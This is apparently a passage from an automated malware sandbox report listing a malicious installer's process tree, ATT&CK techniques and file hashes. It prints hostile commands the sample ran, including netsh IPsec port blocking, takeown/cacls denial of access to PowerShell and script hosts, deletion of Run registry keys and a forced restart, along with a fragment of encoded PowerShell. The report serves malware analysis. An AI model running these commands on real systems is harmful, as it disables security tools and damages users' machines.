AcwBpAEkAbgBzAHQAYQBsAGwAUAByAG8AZAB1AGMAdAAoACIAJABOAGQAUwBVAEkAdwB1AHUAVwBuAHAAWQBIAHoARgB1ACIALAAiACIAKQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAA0ACgB9AA0ACgB1AG4AdABpAGwAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAFIAZQBnAGsAZQB5AHAAYQB0AGgAIAAtAG4AYQBtAGUAIABTAHQAYQB5AE8AbgBUAG8AcAApAA0ACgA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3564
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ayup1s3h\ayup1s3h.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4976
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE3B9.tmp" "c:\Users\Admin\AppData\Local\Temp\ayup1s3h\CSC713BF2EF3925467BA1CFBB8C20E96A1C.TMP"
        7⤵
        
        PID:1636

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2372
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 27AEAD25C4E153E22CE997BC1E479E06
  2⤵
  - Loads dropped DLL
  PID:2752
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding BE8A816737EC332E46BBFDC95EDCCAD4 E Global\MSI0000
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of WriteProcessMemory
  PID:1304
- - C:\Windows\SysWOW64\powercfg.exe
    "C:\Windows\SysWOW64\powercfg.exe" /S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 900; Restart-Computer -Force
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1996
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add policy name=qianye
    3⤵
    PID:1404
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filterlist name=Filter1
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
    3⤵
    PID:4892
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
    3⤵
    PID:1012
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
    3⤵
    PID:232
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
    3⤵
    PID:4272
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
    3⤵
    PID:3616
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1636
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
    3⤵
    PID:3256
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP
    3⤵
    PID:3836
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP
    3⤵
    PID:2176
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP
    3⤵
    PID:1292
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1652
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP
    3⤵
    PID:4196
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP
    3⤵
    PID:3144
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP
    3⤵
    PID:3508
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP
    3⤵
    PID:2016
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4892
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP
    3⤵
    PID:1400
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block
    3⤵
    PID:936
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static set policy name=qianye assign=y
    3⤵
    PID:4380
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\jscript.dll
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3612
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\jscript.dll /E /P everyone:N
    3⤵
    PID:1284
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\jscript.dll
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3768
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\jscript.dll /E /P everyone:N
    3⤵
    PID:1704
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1292
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\cscript.exe
    3⤵
    - Modifies file permissions
    PID:1184
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\cscript.exe /E /P everyone:N
    3⤵
    PID:4576
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\cscript.exe
    3⤵
    - Modifies file permissions
    PID:4116
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\cscript.exe /E /P everyone:N
    3⤵
    PID:4560
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Modifies file permissions
    PID:1532
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N
    3⤵
    PID:4196
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Modifies file permissions
    PID:1620
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /va /f
    3⤵
    PID:3384
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\SysWOW64\reg.exe" delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /va /f
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg /f
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\SysWOW64\sc.exe" stop wmiApSrv
    3⤵
    - Launches sc.exe
    PID:3520
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\SysWOW64\sc.exe" config wmiApSrv start=disabled
    3⤵
    - Launches sc.exe
    PID:2012

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e57f0ea.rbs

Filesize
3KB

MD5
f0711e7b11a92e42154adcb1a7a0d45b

SHA1
edce8f91823593a043d19845bb3fde5ab5f12419

SHA256
c37732d1cb944bc212fcafa8cff6f3f8c4e05ae1e9425a0425a45d16b4b42d9d

SHA512
7332d625f7defe912bea20076c6254ee6b49baad6d590e4381125698b40669d3c83fcbf083450186d8eafdff83ec182e56514fc8f4ba6d1fc60c5c97a82c2bf9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE3B9.tmp

Filesize
1KB

MD5
dd4e29b3eab2a73c986530e09e33b886

SHA1
98d275f6ff283956a2d1e16af670f401a5f87cfe

SHA256
4586501c8d20d75a3fa4f1effd44129c769c620a100035dcb5606be01c2acfb2

SHA512
fb2d1c02313ed6d5140156ba914c459b25897612ae22c65804c110c3d1e84a1071b110d5cc2d27d06133a2287475c5a109c0fed40efddfd7bcd1a166d987caba

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r1a30ykg.vlv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ayup1s3h\ayup1s3h.dll

Filesize
3KB

MD5
d2ca5abefd8b40c454a32ef7cc47cb53

SHA1
93de0db62590b7eec6f5213dc830c19e67d27a52

SHA256
6ee23cd35c4cdc634d68807bdca060cfab6b98914f5913ce430dc708a92181f0

SHA512
f6030be794489178959baa9e23724b01f71c5e3640c31c3e784a2c8cd56c3dcbec86d9d3f282ac40db78215fe561dcd82b410332fa78a5a378c3f73294040515

Download Submit
C:\Windows\Installer\MSIE8E9.tmp

Filesize
2.9MB

MD5
eb9a4cf233789b96f940be0186a26988

SHA1
002a1cee740fa212732379d1f00dbcf7c0cccbf2

SHA256
24d40ba4bf19e3cb942918eb8091ab467b11d5d737aef8e37cffc5306d0081d8

SHA512
725eefc24cf43ad0d5022f20608b1d149e9a4285cde7dc21b621aca3647d402a2ac7a2c0751614bae5f6d98c2b52e280e471f7f67f8916041c042bd1911784ce

Download Submit
C:\Windows\Installer\MSIEBC8.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSIEBC8.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSIEEE6.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSIEEE6.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSIEFC2.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSIEFC2.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSIEFC2.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSIF001.tmp

Filesize
537KB

MD5
d7ec04b009302b83da506b9c63ca775c

SHA1
6fa9ea09b71531754b4cd05814a91032229834c0

SHA256
00c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4

SHA512
171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c

Download Submit
C:\Windows\Installer\MSIF001.tmp

Filesize
537KB

MD5
d7ec04b009302b83da506b9c63ca775c

SHA1
6fa9ea09b71531754b4cd05814a91032229834c0

SHA256
00c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4

SHA512
171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c

Download Submit
C:\Windows\Installer\MSIF0BE.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSIF0BE.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ayup1s3h\CSC713BF2EF3925467BA1CFBB8C20E96A1C.TMP

Filesize
652B

MD5
5b2a019f45de723a8bb87a72dec76520

SHA1
665b02c6fc7894bba1771f1eece9dbf387169b30

SHA256
c440a7fae6d92173d88fcd2f26449cdc2ee364b36c4d61cd5316a90f6c297734

SHA512
86ac8d01a27b1e04803831a4692739da606bf942304ef13ebb8912f523547360d7a64be3cc91bb220bb50a75b4ea78dca25043799e7b04304434a3cb484bb7c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ayup1s3h\ayup1s3h.0.cs

Filesize
354B

MD5
5cc66596055771b708c426b09785ed18

SHA1
fe11be68b5f5f01304e2c6b62458ba70ccc9a575

SHA256
530c7292814fa916aa2846672d0bd17cb4ba54cb8f4f61b9d84e01a51b857c08

SHA512
dc0c9385a85ade45584fc782de2ab285d5ceb535d0ef6d19b610e34c1fde5e6e76fc88d0b6b0e9f922562c4fe26aaaccf6204fae5053e3679f3a104cbf2dfd5c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ayup1s3h\ayup1s3h.cmdline

Filesize
369B

MD5
43473f7f603c22c99122e104b8d6bdf0

SHA1
c345c0af5c5910d2bca38e53463d88ad6785b3aa

SHA256
0714ce0dbf0f2335040e6968535e08ccc86dfc87a71c5f668d0ea5c50366276f

SHA512
aea41636a5cd52b3a166149b53f6faebf512a5a42cbcd8c900a8c2edb2e2e4dccb36d24c9194bfb71a79b5d18ee3c45f3dcdd14e1121af251b6264427dbb396f

Download Submit
memory/1996-167-0x0000000006000000-0x000000000601E000-memory.dmp

Filesize
120KB

Download
memory/1996-150-0x0000000004A40000-0x0000000004A76000-memory.dmp

Filesize
216KB

Download
memory/1996-151-0x0000000072D00000-0x00000000734B0000-memory.dmp

Filesize
7.7MB

Download
memory/1996-152-0x0000000004BC0000-0x0000000004BD0000-memory.dmp

Filesize
64KB

Download
memory/1996-153-0x0000000005200000-0x0000000005828000-memory.dmp

Filesize
6.2MB

Download
memory/1996-154-0x0000000005020000-0x0000000005042000-memory.dmp

Filesize
136KB

Download
memory/1996-155-0x0000000005930000-0x0000000005996000-memory.dmp

Filesize
408KB

Download
memory/1996-161-0x00000000059A0000-0x0000000005A06000-memory.dmp

Filesize
408KB

Download
memory/1996-166-0x0000000005B30000-0x0000000005E84000-memory.dmp

Filesize
3.3MB

Download
memory/1996-168-0x0000000006050000-0x000000000609C000-memory.dmp

Filesize
304KB

Download
memory/1996-169-0x0000000004BC0000-0x0000000004BD0000-memory.dmp

Filesize
64KB

Download
memory/1996-170-0x0000000007860000-0x0000000007EDA000-memory.dmp

Filesize
6.5MB

Download
memory/1996-171-0x0000000006510000-0x000000000652A000-memory.dmp

Filesize
104KB

Download
memory/1996-172-0x0000000072D00000-0x00000000734B0000-memory.dmp

Filesize
7.7MB

Download
memory/1996-173-0x0000000004BC0000-0x0000000004BD0000-memory.dmp

Filesize
64KB

Download
memory/2024-38-0x0000015453950000-0x0000015453972000-memory.dmp

Filesize
136KB

Download
memory/2024-41-0x0000015453780000-0x0000015453790000-memory.dmp

Filesize
64KB

Download
memory/2024-70-0x00007FFFDADB0000-0x00007FFFDB871000-memory.dmp

Filesize
10.8MB

Download
memory/2024-40-0x0000015453780000-0x0000015453790000-memory.dmp

Filesize
64KB

Download
memory/2024-39-0x00007FFFDADB0000-0x00007FFFDB871000-memory.dmp

Filesize
10.8MB

Download
memory/2024-73-0x0000015453780000-0x0000015453790000-memory.dmp

Filesize
64KB

Download
memory/2024-74-0x0000015453780000-0x0000015453790000-memory.dmp

Filesize
64KB

Download
memory/2024-75-0x0000015453780000-0x0000015453790000-memory.dmp

Filesize
64KB

Download
memory/2360-72-0x000001A6C5DC0000-0x000001A6C5DD0000-memory.dmp

Filesize
64KB

Download
memory/2360-71-0x000001A6C5DC0000-0x000001A6C5DD0000-memory.dmp

Filesize
64KB

Download
memory/2360-58-0x00007FFFDADB0000-0x00007FFFDB871000-memory.dmp

Filesize
10.8MB

Download
memory/2360-125-0x000001A6C5DC0000-0x000001A6C5DD0000-memory.dmp

Filesize
64KB

Download
memory/2360-120-0x000001A6C5DC0000-0x000001A6C5DD0000-memory.dmp

Filesize
64KB

Download
memory/2360-112-0x000001A6C5DC0000-0x000001A6C5DD0000-memory.dmp

Filesize
64KB

Download
memory/2360-102-0x00007FFFDADB0000-0x00007FFFDB871000-memory.dmp

Filesize
10.8MB

Download
memory/2360-59-0x000001A6C5DC0000-0x000001A6C5DD0000-memory.dmp

Filesize
64KB

Download
memory/2836-15-0x00007FF808D30000-0x00007FF808F25000-memory.dmp

Filesize
2.0MB

Download
memory/2836-18-0x00007FF7C6D50000-0x00007FF7C6D60000-memory.dmp

Filesize
64KB

Download
memory/2836-57-0x0000013035F50000-0x0000013036F20000-memory.dmp

Filesize
15.8MB

Download
memory/2836-3-0x00007FF808D30000-0x00007FF808F25000-memory.dmp

Filesize
2.0MB

Download
memory/2836-2-0x00007FF7C8DB0000-0x00007FF7C8DC0000-memory.dmp

Filesize
64KB

Download
memory/2836-0-0x00007FF7C8DB0000-0x00007FF7C8DC0000-memory.dmp

Filesize
64KB

Download
memory/2836-4-0x00007FF808D30000-0x00007FF808F25000-memory.dmp

Filesize
2.0MB

Download
memory/2836-7-0x00007FF7C8DB0000-0x00007FF7C8DC0000-memory.dmp

Filesize
64KB

Download
memory/2836-6-0x00007FF808D30000-0x00007FF808F25000-memory.dmp

Filesize
2.0MB

Download
memory/2836-5-0x00007FF7C8DB0000-0x00007FF7C8DC0000-memory.dmp

Filesize
64KB

Download
memory/2836-43-0x00007FF808D30000-0x00007FF808F25000-memory.dmp

Filesize
2.0MB

Download
memory/2836-8-0x00007FF808D30000-0x00007FF808F25000-memory.dmp

Filesize
2.0MB

Download
memory/2836-42-0x00007FF808D30000-0x00007FF808F25000-memory.dmp

Filesize
2.0MB

Download
memory/2836-9-0x00007FF808D30000-0x00007FF808F25000-memory.dmp

Filesize
2.0MB

Download
memory/2836-10-0x00007FF808D30000-0x00007FF808F25000-memory.dmp

Filesize
2.0MB

Download
memory/2836-11-0x00007FF808D30000-0x00007FF808F25000-memory.dmp

Filesize
2.0MB

Download
memory/2836-1-0x00007FF7C8DB0000-0x00007FF7C8DC0000-memory.dmp

Filesize
64KB

Download
memory/2836-26-0x0000013035F50000-0x0000013036F20000-memory.dmp

Filesize
15.8MB

Download
memory/2836-25-0x0000013035F50000-0x0000013036F20000-memory.dmp

Filesize
15.8MB

Download
memory/2836-12-0x00007FF808D30000-0x00007FF808F25000-memory.dmp

Filesize
2.0MB

Download
memory/2836-17-0x00007FF808D30000-0x00007FF808F25000-memory.dmp

Filesize
2.0MB

Download
memory/2836-13-0x00007FF7C6D50000-0x00007FF7C6D60000-memory.dmp

Filesize
64KB

Download
memory/2836-14-0x00007FF808D30000-0x00007FF808F25000-memory.dmp

Filesize
2.0MB

Download
memory/2836-69-0x0000013035F50000-0x0000013036F20000-memory.dmp

Filesize
15.8MB

Download
memory/2836-16-0x00007FF808D30000-0x00007FF808F25000-memory.dmp

Filesize
2.0MB

Download
memory/3564-91-0x0000022C52700000-0x0000022C52710000-memory.dmp

Filesize
64KB

Download
memory/3564-148-0x0000022C52700000-0x0000022C52710000-memory.dmp

Filesize
64KB

Download
memory/3564-147-0x00007FFFDADB0000-0x00007FFFDB871000-memory.dmp

Filesize
10.8MB

Download
memory/3564-110-0x0000022C526E0000-0x0000022C526E8000-memory.dmp

Filesize
32KB

Download
memory/3564-77-0x00007FFFDADB0000-0x00007FFFDB871000-memory.dmp

Filesize
10.8MB

Download
memory/3564-78-0x0000022C52700000-0x0000022C52710000-memory.dmp

Filesize
64KB

Download
memory/3564-149-0x0000022C52700000-0x0000022C52710000-memory.dmp

Filesize
64KB

Download
memory/5008-81-0x00007FFFDADB0000-0x00007FFFDB871000-memory.dmp

Filesize
10.8MB

Download
memory/5008-53-0x00007FFFDADB0000-0x00007FFFDB871000-memory.dmp

Filesize
10.8MB

Download
memory/5008-93-0x000001EF75E80000-0x000001EF75E90000-memory.dmp

Filesize
64KB

Download
memory/5008-55-0x000001EF75E80000-0x000001EF75E90000-memory.dmp

Filesize
64KB

Download
memory/5008-92-0x000001EF75E80000-0x000001EF75E90000-memory.dmp

Filesize
64KB

Download
memory/5008-54-0x000001EF75E80000-0x000001EF75E90000-memory.dmp

Filesize
64KB

Download
memory/5008-96-0x000001EF75E80000-0x000001EF75E90000-memory.dmp

Filesize
64KB

Download
memory/5008-56-0x000001EF75E80000-0x000001EF75E90000-memory.dmp

Filesize
64KB

Download